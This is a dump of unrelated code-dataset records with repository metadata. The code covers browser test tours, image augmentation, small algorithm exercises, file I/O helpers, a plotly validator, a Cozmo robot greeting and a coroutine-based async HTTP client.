] | permissive | 766/SeleniumBase | 7e23adb3d40cf3d9912e2ff0f4dd56c2fafdb29b | b81e7b93e16a9abee6d2386f55c97843aa90a7d9 | refs/heads/master | 2020-08-22T08:54:47.269550 | 2019-12-06T13:44:17 | 2019-12-06T13:44:17 | 216,360,246 | 1 | 0 | MIT | 2019-12-06T13:44:18 | 2019-10-20T12:43:47 | null | UTF-8 | Python | false | false | 1,051 | py | from seleniumbase import BaseCase
class MyTestClass(BaseCase):
def test_basic(self):
self.open('https://xkcd.com/1117/')
self.assert_element('img[alt="My Sky"]')
self.create_shepherd_tour()
self.add_tour_step("Welcome to XKCD!")
self.add_tour_step("This is the XKCD logo.", "#masthead img")
self.add_tour_step("Here's the daily webcomic.", "#comic img")
self.add_tour_step("This is the title.", "#ctitle", alignment="top")
self.add_tour_step("Click here for the next comic.", 'a[rel="next"]')
self.add_tour_step("Click here for the previous one.", 'a[rel="prev"]')
self.add_tour_step("Learn about the author here.", 'a[rel="author"]')
self.add_tour_step("Click here for the license.", 'a[rel="license"]')
self.add_tour_step("Click for a random comic.", 'a[href*="/random/"]')
self.add_tour_step("Thanks for taking this tour!")
self.export_tour(filename="xkcd_tour.js") # Exports the tour
self.play_tour() # Plays the tour
| [
"mdmintz@gmail.com"
] | mdmintz@gmail.com |
e82882454e7c7b079412b3a407adef7c35b5b239 | 501b6a773f82a44dba7e2393108c839e33b355a6 | /09_strings-and-text/09_05_new_friends_1.py | 9f584b942188cfc7da1a3894e2ec5626472c2738 | [] | no_license | Bat-Turtle/python-101 | fda2c79e3a270924f37494b25377b5645098a5c7 | 8f4582a5a9b398d2163c27aa8fe433efd8ff69fa | refs/heads/main | 2023-08-19T16:37:46.732125 | 2021-10-26T16:46:46 | 2021-10-26T16:46:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 67 | py | # Write code that produces a SyntaxError when you run this script.
| [
"breuss.martin@gmail.com"
] | breuss.martin@gmail.com |
2c50b80a79ede26179b05b15661a360e8989d621 | 31a76dee722a0ac480c66a140ad6174317673590 | /utils.py | 3f37a2ea92fac7bb70abd60a091b6901fa7ebcab | [
"BSD-3-Clause"
] | permissive | 84KaliPleXon3/pacu | 0daa9478efa06d66efba55f1423ece17600e4585 | c7a593508bce3a23a9e8bfb074b3a9e3273b0847 | refs/heads/master | 2023-05-07T02:13:16.002285 | 2020-07-23T22:28:13 | 2020-07-23T22:28:13 | 282,970,681 | 1 | 1 | BSD-3-Clause | 2021-06-02T02:39:41 | 2020-07-27T17:38:19 | Python | UTF-8 | Python | false | false | 2,416 | py | import signal
import sys
import datetime
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from core.base import DATABASE_CONNECTION_PATH
def get_database_connection(database_connection_path=DATABASE_CONNECTION_PATH):
""" Unlike database file paths, database connection paths must begin with
sqlite:/// """
assert database_connection_path.startswith('sqlite:///'), 'Database connection path must start with sqlite:///'
engine = create_engine(database_connection_path)
Base = declarative_base()
Base.metadata.bind = engine
Session = sessionmaker(bind=engine)
return Session()
def remove_empty_from_dict(d):
""" Reference: https://stackoverflow.com/a/24893252 """
if type(d) is dict:
return dict((k, remove_empty_from_dict(v)) for k, v in d.items() if v and remove_empty_from_dict(v))
elif type(d) is list:
return [remove_empty_from_dict(v) for v in d if v and remove_empty_from_dict(v)]
else:
return d
def stringify_datetime(obj):
""" The sqlalchemy-utils' JSONType doesn't accept Python datetime objects.
This method converts all datetime objects in JSONizable data structures
into strings, allowing the ORM to save them. """
if isinstance(obj, dict):
# If obj is a dict, iterate over its items and recusrively call
# stringify_datetime on each of them.
new_dict = dict()
for k, v in obj.items():
new_dict[k] = stringify_datetime(v)
return new_dict
elif isinstance(obj, list):
# If obj is a list, iterate over its elements and recusrively call
# stringify_datetime on each of them.
new_list = list()
for v in obj:
new_list.append(stringify_datetime(v))
return new_list
elif isinstance(obj, datetime.datetime):
# If obj is a datetime, return a formatted string version of it
return str(obj.strftime("%a, %d %b %Y %H:%M:%S"))
else:
return obj
def set_sigint_handler(exit_text=None, value=0):
def sigint_handler(signum, frame):
""" This is to stop the error printed when CTRL+Cing out of the program
so it can exit gracefully. """
if exit_text is not None:
print(exit_text)
sys.exit(value)
signal.signal(signal.SIGINT, sigint_handler)
| [
"spencer.gietzen@rhinosecuritylabs.com"
] | spencer.gietzen@rhinosecuritylabs.com |
a5ee8b7271e9e0da6bd88f441dcf2a89f1596281 | aa3ce8a382f558da491a9b2805207e48a6799c7e | /augmentations.py | 65e0761e0cb83d303867247c74dbcf3fbd11d6cd | [] | no_license | shao15xiang/human_protein_atlas | 6c203ef7edc9c92b5934004f4a920ca0f04248a1 | 40d0211098ae75c7959e26e31ccc97531751cde2 | refs/heads/master | 2020-04-10T22:44:30.746683 | 2018-12-10T07:33:09 | 2018-12-10T07:33:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,420 | py | from albumentations import (
HorizontalFlip, IAAPerspective, ShiftScaleRotate, CLAHE, RandomRotate90,
Transpose, ShiftScaleRotate, Blur, OpticalDistortion, GridDistortion, HueSaturationValue,
IAAAdditiveGaussianNoise, GaussNoise, MotionBlur, MedianBlur, IAAPiecewiseAffine,
IAASharpen, IAAEmboss, RandomContrast, RandomBrightness, Flip, OneOf, Compose, ElasticTransform
)
from random import randrange
from random import randint
import numpy as np
from scipy.misc import imread
import matplotlib.pyplot as plt
import scipy.misc
from tqdm import tqdm_notebook, tqdm
def load_image(image_id='00383b44-bbbb-11e8-b2ba-ac1f6b6435d0'):
path = '../DATASET/human_protein_atlas/all/train/'
image = np.zeros(shape=(512, 512, 4), dtype=np.uint8)
image[:, :, 0] = imread(path + image_id + "_green" + ".png")
image[:, :, 1] = imread(path + image_id + "_blue" + ".png")
image[:, :, 2] = imread(path + image_id + "_red" + ".png")
image[:, :, 3] = imread(path + image_id + "_yellow" + ".png")
return image
def strong_aug(p=0.5):
return Compose([
RandomRotate90(),
Flip(),
Transpose(),
ElasticTransform(p=1.0),
OneOf([
IAAAdditiveGaussianNoise(),
GaussNoise(),
], p=0.2),
OneOf([
MotionBlur(p=0.2),
MedianBlur(blur_limit=3, p=0.1),
Blur(blur_limit=3, p=0.1),
], p=0.2),
ShiftScaleRotate(shift_limit=0.0625, scale_limit=0.2, rotate_limit=45, p=0.2),
OneOf([
OpticalDistortion(p=0.3),
GridDistortion(p=0.1),
IAAPiecewiseAffine(p=0.3),
], p=0.2),
OneOf([
# CLAHE(clip_limit=2),
IAASharpen(),
IAAEmboss(),
RandomContrast(),
RandomBrightness(),
], p=0.3),
# HueSaturationValue(p=0.3),
], p=p)
image = load_image()
scipy.misc.imsave(f'./augs/origing.jpg', image[:, :, :3])
whatever_data = "my name"
augmentation = strong_aug(p=1.0)
data = {"image": image}
for n in range(1000):
# augmented = augmentation(**data)
# image = augmented["image"]
image = augmentation(**data)["image"]
# print(f'shape={image.shape}')
if image.shape[2] == 3:
print(f'shape={image.shape}')
scipy.misc.imsave(f'./augs/{randint(1, 100000000)}.jpg', image[:, :, :3])
# plt.imshow(image[:, :, :3])
# plt.show() | [
"igor.soldatov@gmail.com"
] | igor.soldatov@gmail.com |
5f3ee79f89fafb19dad9451f6cffe1c65b2d3829 | c947f34d61fe1e9a13d2278a96d44055b775cafa | /Practica3/max_crossing_subarray.py | ba92fc9f7766d2e63efdc4fd4e43ef97eaa5adef | [] | no_license | Gushley110/Analisis_de_Algoritmos | 7524bc35627def747e6cfd6bb6c85262e0d85304 | 8d00f76febf64ee66ff000243a240208620241c5 | refs/heads/master | 2020-03-17T08:21:29.465639 | 2018-05-15T00:16:49 | 2018-05-15T00:16:49 | 133,435,708 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 573 | py | def max_crossing_subarray(array,low,mid,high):
left = -10000
right = -10000
sum = 0
for i in range(mid,low-1,-1):
sum += array[i]
print("Left:",array[i])
if (sum > left):
left = sum
max_left = i
sum = 0
for j in range(mid+1,high):
sum += array[j]
print("Right:",array[j])
if (sum > right):
right = sum
max_right = j
return [max_left,max_right,left+right]
def main():
array = [2, 3, 4, 5, 7]
low = 0
high = len(array)
mid = (low + high) // 2
print(max_crossing_subarray(array,low,mid,high))
if __name__ == '__main__':
main() | [
"gusley_dominator@hotmail.com"
] | gusley_dominator@hotmail.com |
840818ed1d4ca9614ddc8d07d9a5a898c8711762 | 8cd57eb880c6e774a79465023a7ca4590163b3bd | /db.py | ab84376bd4cff6f8c213438669dd070749536fe4 | [] | no_license | 0xanp/Blackjack | 57c389ac9224d7e6e54ae0f36cca5c742ce404da | eb6c27c2e9a8cac95c7d9e7e217c68f0184c35e9 | refs/heads/master | 2022-06-05T03:33:27.183525 | 2020-01-01T02:13:30 | 2020-01-01T02:13:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 321 | py | FILENAME = "money.txt"
def write_money(money):
with open(FILENAME, "w") as file:
file.write(str(money))
def read_money():
try:
with open(FILENAME, "r") as file:
line = file.readline()
money = float(line)
return money
except FileNotFoundError:
return None
| [
"anbinhpham110799@gmail.com"
] | anbinhpham110799@gmail.com |
406388d49c81933799d471eb501b9b1c2cc3f50f | 2dca600f76ecd234ab5a87aa23f4f924b48a9759 | /hello_cozmo.py | 438d9cc3ee4b2ca9773490e170b030311dbc6647 | [] | no_license | LCasta17/HelloCozmo | ac4edfca243b5f5e27a3b2428e2eaf996a3f99b4 | ada4be4b021ebe35e231fa4ae09d77935f773ae9 | refs/heads/master | 2021-05-02T12:50:25.565848 | 2018-11-27T22:42:01 | 2018-11-27T22:51:40 | 120,747,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | #!/usr/bin/env python3
'''Merry Christmas
Make Cozmo say 'Merry Christmas' to Axel & Eléa.
'''
import cozmo
def cozmo_program(robot: cozmo.robot.Robot):
robot.say_text("Hello Axel and Eléa. I wish you a Merry Christmas!").wait_for_completed()
cozmo.run_program(cozmo_program)
| [
"lcastanie@dhcp-100-97-61-128.svl.corp.google.com"
] | lcastanie@dhcp-100-97-61-128.svl.corp.google.com |
dc3a3df04d9eba2f8895e74b91128c8c0b6b8a41 | 6413fe58b04ac2a7efe1e56050ad42d0e688adc6 | /tempenv/lib/python3.7/site-packages/plotly/validators/scattergeo/marker/colorbar/_title.py | e584a0b07ef22e6fd0a89b476a1df8aef97c2e3d | [
"MIT"
] | permissive | tytechortz/Denver_temperature | 7f91e0ac649f9584147d59193568f6ec7efe3a77 | 9d9ea31cd7ec003e8431dcbb10a3320be272996d | refs/heads/master | 2022-12-09T06:22:14.963463 | 2019-10-09T16:30:52 | 2019-10-09T16:30:52 | 170,581,559 | 1 | 0 | MIT | 2022-06-21T23:04:21 | 2019-02-13T21:22:53 | Python | UTF-8 | Python | false | false | 1,264 | py | import _plotly_utils.basevalidators
class TitleValidator(_plotly_utils.basevalidators.TitleValidator):
def __init__(
self,
plotly_name='title',
parent_name='scattergeo.marker.colorbar',
**kwargs
):
super(TitleValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop('data_class_str', 'Title'),
data_docs=kwargs.pop(
'data_docs', """
font
Sets this color bar's title font. Note that the
title's font used to be set by the now
deprecated `titlefont` attribute.
side
Determines the location of color bar's title
with respect to the color bar. Note that the
title's location used to be set by the now
deprecated `titleside` attribute.
text
Sets the title of the color bar. Note that
before the existence of `title.text`, the
title's contents used to be defined as the
`title` attribute itself. This behavior has
been deprecated.
"""
),
**kwargs
)
| [
"jmswank7@gmail.com"
] | jmswank7@gmail.com |
ffcbace8393906b7652d282087d796a02f36841c | b5bc2246081c4878f2c59ea9e517d63c9543ae02 | /twistedUtils.py | af3066b9268d533ee0de49f12304fdea743cf635 | [] | no_license | TheDeusGroup/generic-twisted-handler | e93496531c0fb3e654ae01a3d1d9669a469342e6 | 5fa6a9360614c9790b8cff481cafe104925e0820 | refs/heads/master | 2021-02-06T21:03:04.079694 | 2020-02-29T08:58:43 | 2020-02-29T08:58:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 646 | py | #########################
# utils func for Twisted Client and Server handlers
#########################
from const import BASE_MESSAGE, EnvMapping
import json
import copy
def buildMessage( event, kwargs = None ):
''' Builds a JSON message between Clients and Servers
Inputs:
event: str: type of event you are sending
kwargs: dict: anything of interest you with to send on
Returns:
json: message to transfer between client and server
'''
kwargs = kwargs or {}
msgDict = copy.deepcopy( BASE_MESSAGE )
msgDict[ EnvMapping.EVENT.value ] = event
msgDict.update( kwargs )
return msgDict
| [
"twvoegt92@gmail.com"
] | twvoegt92@gmail.com |
52487d8cf7c2315f041b691dcaaa4e0b2f68cfbb | 486244b49422ebea1a3b51d4fe9a6e59939cc86c | /MyAsyncHttp/coroutine_version/async_io_utils/http_request.py | 54cd25d109231380feeaf6a07033c105252a9181 | [] | no_license | heiwushi/MyAsyncHttp | 7d032b62174dbb146e3a48c39a42eae17a59ba46 | 19d157399e0b2cc5396e226797a4cd97bae9488e | refs/heads/wangchen | 2022-12-02T05:24:57.387304 | 2020-08-09T01:41:43 | 2020-08-09T01:41:43 | 275,340,901 | 1 | 0 | null | 2020-07-25T10:11:22 | 2020-06-27T09:37:16 | Python | UTF-8 | Python | false | false | 4,667 | py | from MyAsyncHttp.coroutine_version.loop import get_event_loop
import socket
from MyAsyncHttp.coroutine_version.fd_manger import FdManger
from MyAsyncHttp.coroutine_version.http_utils import parse_http_response_header
import select
from MyAsyncHttp.coroutine_version.future import Future
from collections import defaultdict
import traceback as tb
import logging
loop = get_event_loop()
fd_manager = FdManger()
DEFAULT_HEADER = {
"CONNECTION": "close", # 暂时不支持keep-alive
}
HTTP_VERSION = "HTTP/1.1"
fd_callback_dict = defaultdict(dict)
def build_http_header_line(method, endpoint, header):
request_msg = ""
request_msg += method + " " + endpoint + " " + HTTP_VERSION + "\r\n"
for head_name in header:
request_msg += head_name + ":" + header[head_name] + "\r\n"
request_msg += "\r\n"
return request_msg
def parse_host_port(url):
url = url.replace("http://", "")
url_splits = url.split('/')
host_port = url_splits[0].split(":")
if len(host_port) == 1:
host = host_port[0]
port = 80
else:
host, port = host_port
if len(url_splits) > 1:
end_point = "/" + "/".join(url_splits[1:])
else:
end_point = "/"
return host, port, end_point
def add_default_header(header, host):
header = dict(header)
header.update(DEFAULT_HEADER)
header["HOST"] = host
return header
def connect(host, port):
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd = client_socket.fileno()
fd_manager.add_fd(fd, client_socket, "socket")
client_socket.setblocking(False)
try:
client_socket.connect((host, port))
except BlockingIOError:
pass
future = Future("connect")
def on_connected(fd, event):
future.set_result(True) # 6.set_result时会调用回调方法,而回调方法又会调用send促使代码从注释3处继续向下走, is_connected收到的值为True
loop.register(fd, select.EPOLLOUT, on_connected)
is_connected = yield from future # 3.执行到此处, 将表示建立连接的future返回给Task._step方法里send调用处,之后代码让出控制权
loop.unregister(fd)
return client_socket
def recv(client_socket):
fd = client_socket.fileno()
i = 0
header = {}
read_buffer = b''
is_header_read = False
content_length = None
while True:
future = Future("recv" + str(i))
def on_reachable(fd, event):
chunked = client_socket.recv(1024)
future.set_result(chunked)
loop.register(fd, select.EPOLLIN, on_reachable)
chunked = yield from future
if chunked == b'': # 连接关闭
loop.unregister(fd)
client_socket.close()
fd_manager.del_fd(fd)
raise Exception('Remote connection close.')
loop.unregister(fd)
read_buffer += chunked
if not is_header_read and b'\r\n\r\n' in read_buffer: # 说明响应头已经收到了,解析响应头
head_finish_index = read_buffer.index(b'\r\n\r\n') + 4
body_start_index = head_finish_index
header_data = read_buffer[0:head_finish_index]
read_buffer = read_buffer[body_start_index:] # 只保留请求体部分
header = parse_http_response_header(header_data)
if header.get("Content-Length"):
content_length = int(header.get("Content-Length"))
is_header_read = True
else:
# 暂时要求响应头必须包含content-length
raise Exception("content-length can't be empty")
if is_header_read and len(read_buffer) == content_length:
body_data = read_buffer
fd_manager.del_fd(fd)
return header, body_data
def request(method, url, header=None):
assert url.startswith("http://") # 暂时只支持http协议
method = method.upper()
host, port, end_point = parse_host_port(url)
header = add_default_header(header, host)
request_msg = build_http_header_line(method, end_point, header)
request_bytes = request_msg.encode('ascii')
client_socket = yield from connect(host, port)
client_socket.send(request_bytes)
res_header, res_body = yield from recv(client_socket)
client_socket.close()
return res_header, res_body
# if __name__ == '__main__':
# from MyAsyncHttp.coroutine_version.task import Task
# def call_fun():
# res_header, res_body = yield from request("GET", "http://www.baidu.com", header=[])
# print(res_header)
# print(res_body)
#
#
# Task(call_fun())
# loop.start() | [
"447648965@qq.com"
] | 447648965@qq.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.